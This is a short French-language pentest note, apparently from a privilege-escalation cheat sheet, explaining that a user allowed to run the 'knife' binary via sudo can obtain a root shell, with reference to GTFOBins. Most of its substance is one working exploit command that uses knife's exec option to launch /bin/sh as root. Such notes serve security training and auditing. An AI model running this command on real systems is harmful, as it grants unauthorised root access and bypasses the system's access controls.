Sudo (Knife) - Linux Privilege Escalation

En exécutant sudo -l, on observe que l'utilisateur peut exécuter le binaire knife en tant que root :

Ce binaire est référencé sur GTFOBins comme permettant une élévation de privilèges.

Exploitation

Utilisez la commande ci-dessus pour obtenir un shell root.

sudo /usr/bin/knife exec -E 'exec "/bin/sh"'

Mis à jour il y a 12 mois

Ce contenu vous a-t-il été utile ?